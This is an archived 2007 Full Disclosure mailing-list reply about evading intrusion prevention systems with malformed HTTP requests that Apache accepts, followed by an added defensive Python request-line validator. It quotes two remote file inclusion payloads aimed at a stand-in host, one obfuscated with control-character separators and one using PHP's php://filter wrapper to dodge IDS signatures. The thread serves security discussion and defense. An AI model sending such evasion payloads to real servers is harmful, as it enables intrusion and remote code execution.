Full Disclosure mailing list archives
Re: IPS Evasion with the Apache HTTP Server
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 20 Jun 2007 17:50:55 +0400
Dear Jamie Riden,

--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A () security nnov ru:

JR> (This is what I gathered from the original posting, but I might be wrong.)

JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,

Original BreakingPoint articles author refers to says "The intent is describe the strange behaviors of network applications". It mentions neither of IPS products, but IIS and Apache. And at least one case of Apache behavior is partially expected (because of RFC) and already described (by Michal Majchrowicz).

JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:

JR> \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

IPS may detect known attacks. Just like antivirus, you may use IPS to protect against known viruses/exploits. An ability to bypass IPS with a new one is not a bug. I do collect different content filtering bypassing methods:

http://securityvulns.com/advisories/content.asp

You simply MUST accept the risk there is always the way to bypass content filtering. IPS like doesn't protect your network by itself. IPS is nothing but a tool.

JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request"., when it should actually be alerting that a
JR> RFI attempt was made.

In this situation IDS/IPS should alert that an unsupported request attempt was made, and block this attempt in case of IPS.

JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )

I can write a buggy application, and an attempt to exploit it will never be detected by existing signatures.
--
~/ZARAZA http://securityvulns.com/
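Added example, not part of the original message: a sketch of the behaviour argued for in the reply above, where an inspection device blocks and reports any request line it cannot parse strictly instead of skipping it as "not HTTP". The function name, verdict strings and all sample requests except the one quoted in the thread are assumptions, and the grammar is deliberately narrower than what a server tolerates.

```python
import re

# Strict request-line grammar: method SP request-target SP HTTP-version,
# exactly one 0x20 between fields and printable ASCII only.
TOKEN = rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
STRICT_LINE = re.compile(TOKEN + rb" [\x21-\x7e]+ HTTP/\d\.\d")

def inspect(raw: bytes):
    """Return (verdict, reason). Anything not strictly valid is blocked
    and reported, never silently ignored as 'not a valid HTTP request'."""
    if raw.startswith((b"\r", b"\n")):
        return ("block", "empty line(s) before request line")
    line, sep, _ = raw.partition(b"\r\n")
    if not sep:
        return ("block", "request line not terminated by CRLF")
    bad = [b for b in line if b < 0x20 or b > 0x7e]
    if bad:
        return ("block", "control or non-ASCII byte 0x%02x in request line" % bad[0])
    if not STRICT_LINE.fullmatch(line):
        return ("block", "request line is not 'method SP target SP version'")
    return ("pass", "well-formed request line; hand to signature matching")

# The request quoted in the thread, byte for byte.
PAGE_REQUEST = (b"\r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com"
                b"\x0bHTTP/1.0\r\n\r\n")

# Constructed samples (not from the thread).
SAMPLES = [
    b"GET /index.html HTTP/1.0\r\n\r\n",       # strictly valid
    PAGE_REQUEST,                               # leading CRLFs, FF and VT separators
    b"GET\t/index.html\tHTTP/1.0\r\n\r\n",     # tabs instead of spaces
    b"GET  /index.html HTTP/1.0\r\n\r\n",      # two spaces between fields
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict, reason = inspect(sample)
        print(f"{verdict:5} {reason:55} {sample[:40]!r}")
```

Because the verdict depends on the request's form and not on a known payload, the thread's request is blocked whether or not any signature exists for the application it targets.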